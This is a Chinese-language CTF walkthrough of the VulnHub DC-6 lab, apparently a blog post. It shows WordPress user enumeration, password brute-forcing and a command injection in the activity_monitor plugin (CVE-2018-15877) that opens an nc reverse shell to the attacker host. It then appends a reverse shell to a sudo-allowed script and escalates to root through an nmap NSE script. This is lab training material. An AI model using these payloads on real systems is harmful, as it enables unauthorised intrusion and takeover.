CTF-DC6靶機(jī)攻防

靶機(jī)描述

Description

DC-6 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing.

This isn't an overly difficult challenge so should be great for beginners.

The ultimate goal of this challenge is to get root and to read the one and only flag.

Linux skills and familiarity with the Linux command line are a must, as is some experience with basic penetration testing tools.

For beginners, Google can be of great assistance, but you can always tweet me at @DCAU7 for assistance to get you going again. But take note: I won't give you the answer, instead, I'll give you an idea about how to move forward.

Technical Information

DC-6 is a VirtualBox VM built on Debian 64 bit, but there shouldn't be any issues running it on most PCs.

I have tested this on VMWare Player, but if there are any issues running this VM in VMware, have a read through of this.

It is currently configured for Bridged Networking, however, this can be changed to suit your requirements. Networking is configured for DHCP.

Installation is simple - download it, unzip it, and then import it into VirtualBox or VMWare and away you go.

NOTE: You WILL need to edit your hosts file on your pentesting device so that it reads something like:

192.168.0.142 wordy

NOTE: I've used 192.168.0.142 as an example. You'll need to use your normal method to determine the IP address of the VM, and adapt accordingly.

This is VERY important.

And yes, it's another WordPress based VM (although only my second one).

實(shí)驗(yàn)環(huán)境

  • 攻擊主機(jī)kali2020:172.25.0.69
  • 靶機(jī)DC6:mac地址00:0c:29:90:0a:a3
    DC6下載地址:https://www.vulnhub.com/entry/dc-6,315/
    根據(jù)靶機(jī)描述信息修改本機(jī)hosts文件
    hosts文件路徑
  • windows:C:\Windows\System32\drivers\etc

  • linux:/etc/hosts


    image.png

0x01 主機(jī)發(fā)現(xiàn)

抓包得到DC6靶機(jī)IP為172.25.0.68

kali@kali:~$ sudo netdiscover -i eth0 -r 172.25.0.0/24
 Currently scanning: Finished!   |   Screen View: Unique Hosts                        
                                                                                      
 17 Captured ARP Req/Rep packets, from 4 hosts.   Total size: 1020                    
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 172.25.0.1      00:50:56:c0:00:08      9     540  VMware, Inc.                       
 172.25.0.2      00:50:56:f8:42:a0      4     240  VMware, Inc.                       
 172.25.0.100    00:50:56:f6:d0:4b      2     120  VMware, Inc.                       
 172.25.0.68     00:0c:29:90:0a:a3      2     120  VMware, Inc.

0x02 端口掃描

kali@kali:~$ nmap -A -p- 172.25.0.68
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-26 05:33 EST
Nmap scan report for wordy (172.25.0.68)
Host is up (0.00029s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey: 
|   2048 3e:52:ce:ce:01:b6:94:eb:7b:03:7d:be:08:7f:5f:fd (RSA)
|   256 3c:83:65:71:dd:73:d7:23:f8:83:0d:e3:46:bc:b5:6f (ECDSA)
|_  256 41:89:9e:85:ae:30:5b:e0:8f:a4:68:71:06:b4:15:ee (ED25519)
80/tcp open  http    Apache httpd 2.4.25 ((Debian))
|_http-generator: WordPress 5.1.1
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Wordy – Just another WordPress site
|_https-redirect: ERROR: Script execution failed (use -d to debug)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.31 seconds

0x03 信息收集

由于DC6基于wordpressCMS搭建
直接用wpscan掃描
參數(shù)用法詳情:-e 枚舉 u用戶名 --plugins-detection vp含有漏洞的插件 mixed 混合模式(主動(dòng)加被動(dòng))
收集到后臺(tái)用戶名和后臺(tái)登錄頁(yè)面,并制作用戶字典user.dic為下一步密碼爆破做準(zhǔn)備

kali@kali:~$ wpscan --url http://wordy -e vp,u --plugins-detection mixed
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ?
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.7.6
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://wordy/
[+] Started: Wed Feb 26 05:38:53 2020

Interesting Finding(s):

[+] http://wordy/
 | Interesting Entry: Server: Apache/2.4.25 (Debian)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] http://wordy/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access

[+] http://wordy/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Upload directory has listing enabled: http://wordy/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] http://wordy/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 5.1.1 identified (Insecure, released on 2019-03-13).
 | Found By: Rss Generator (Passive Detection)
 |  - http://wordy/index.php/feed/, <generator>https://wordpress.org/?v=5.1.1</generator>
 |  - http://wordy/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.1.1</generator>

[+] WordPress theme in use: twentyseventeen
 | Location: http://wordy/wp-content/themes/twentyseventeen/
 | Last Updated: 2019-05-07T00:00:00.000Z
 | Readme: http://wordy/wp-content/themes/twentyseventeen/README.txt
 | [!] The version is out of date, the latest version is 2.2
 | Style URL: http://wordy/wp-content/themes/twentyseventeen/style.css?ver=5.1.1
 | Style Name: Twenty Seventeen
 | Style URI: https://wordpress.org/themes/twentyseventeen/
 | Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Css Style In Homepage (Passive Detection)
 |
 | Version: 2.1 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://wordy/wp-content/themes/twentyseventeen/style.css?ver=5.1.1, Match: 'Version: 2.1'

[+] Enumerating Vulnerable Plugins (via Passive and Aggressive Methods)
 Checking Known Locations - Time: 00:00:03 <=====> (2206 / 2206) 100.00% Time: 00:00:03
[+] Checking Plugin Versions (via Passive and Aggressive Methods)

[i] No plugins Found.

[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:00 <=========> (10 / 10) 100.00% Time: 00:00:00

[i] User(s) Identified:

[+] admin
 | Found By: Rss Generator (Passive Detection)
 | Confirmed By:
 |  Wp Json Api (Aggressive Detection)
 |   - http://wordy/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] mark
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] graham
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] sarah
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] jens
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[!] No WPVulnDB API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 50 daily requests by registering at https://wpvulndb.com/users/sign_up

[+] Finished: Wed Feb 26 05:39:09 2020
[+] Requests Done: 2274
[+] Cached Requests: 6
[+] Data Sent: 518.972 KB
[+] Data Received: 974.406 KB
[+] Memory used: 223.238 MB
[+] Elapsed time: 00:00:16

0x04 后臺(tái)登錄表單爆破

按照DC6描述來制作密碼字典

gunzip /usr/share/wordlists/rockyou.txt.gz 
cat  /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt    //破譯含有k01的字符行

使用wpscan進(jìn)行密碼爆破
wpscan --url http://wordy -U user.dic -P passwords.txt
得到 Username: mark, Password: helpdesk01

0x04 漏洞發(fā)現(xiàn)

利用爆破得到的后臺(tái)用戶賬密登錄后臺(tái)

image.png

發(fā)現(xiàn)網(wǎng)站安裝了activity_monitor插件,思路:查找該插件存在漏洞
發(fā)現(xiàn)存在編號(hào)CVE-2018-15877遠(yuǎn)程命令執(zhí)行漏洞
利用方法:利用bp抓取http://wordy/wp-admin/admin.php?page=plainview_activity_monitor&tab=activity_tools頁(yè)面的http包輸入ip,點(diǎn)擊lookup,通過抓包修改ip參數(shù)的值為baidu.com | nc -e /bin/bash 172.25.0.69 1234
image.png

在mark用戶家目錄下的stuff目錄下的things-to-do.txt中拿到graham用戶的密碼

www-data@dc-6:/home/mark/stuff$ cat things-to-do.txt
cat things-to-do.txt
Things to do:

- Restore full functionality for the hyperdrive (need to speak to Jens)
- Buy present for Sarah's farewell party
- Add new user: graham - GSo7isUM1D4 - done
- Apply for the OSCP course
- Buy new laptop for Sarah's replacement
www-data@dc-6:/home/mark/stuff$

0x05 sudo提權(quán)

ssh連接graham用戶,并查看sudo權(quán)限

graham@dc-6:~$ sudo -l
Matching Defaults entries for graham on dc-6:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User graham may run the following commands on dc-6:
    (jens) NOPASSWD: /home/jens/backups.sh

思路:在backups.sh腳本中追加nc反彈shell拿到j(luò)ens用戶權(quán)限

graham@dc-6:/home/jens$ cat >>backups.sh <<EOF
> nc -e /bin/bash 172.25.0.69 6666
> EOF
graham@dc-6:/home/jens$ sudo -u jens ./backups.sh 
tar: Removing leading `/' from member names

kali@kali:~$ nc -lvvp 6666
listening on [any] 6666 ...
connect to [172.25.0.69] from wordy [172.25.0.68] 33638
python -c 'import pty;pty.spawn("/bin/bash")'

查看jens用戶能以sudo執(zhí)行的命令

jens@dc-6:~$ sudo -l
sudo -l
Matching Defaults entries for jens on dc-6:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

思路:利用nmap調(diào)用腳本切換root權(quán)限

jens@dc-6:~$ echo 'os.execute("/bin/sh")' > getroot.nse
echo 'os.execute("/bin/sh")' > getroot.nse
jens@dc-6:~$ sudo nmap --script getroot.nse
sudo nmap --script getroot.nse

Starting Nmap 7.40 ( https://nmap.org ) at 2020-02-26 22:04 AEST
# whoami
root
# ls
backups.sh  backups.tar.gz  getroot.nse
# cd /root
# ls
theflag.txt
# cat theflag.txt


Yb        dP 888888 88     88         8888b.   dP"Yb  88b 88 888888 d8b 
 Yb  db  dP  88__   88     88          8I  Yb dP   Yb 88Yb88 88__   Y8P 
  YbdPYbdP   88""   88  .o 88  .o      8I  dY Yb   dP 88 Y88 88""   `"' 
   YP  YP    888888 88ood8 88ood8     8888Y"   YbodP  88  Y8 888888 (8) 


Congratulations!!!

Hope you enjoyed DC-6.  Just wanted to send a big thanks out there to all those
who have provided feedback, and who have taken time to complete these little
challenges.

If you enjoyed this CTF, send me a tweet via @DCAU7.


#

通過nmap提權(quán)成root權(quán)限,并拿下flag。

最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請(qǐng)聯(lián)系作者
平臺(tái)聲明:文章內(nèi)容(如有圖片或視頻亦包括在內(nèi))由作者上傳并發(fā)布,文章內(nèi)容僅代表作者本人觀點(diǎn),簡(jiǎn)書系信息發(fā)布平臺(tái),僅提供信息存儲(chǔ)服務(wù)。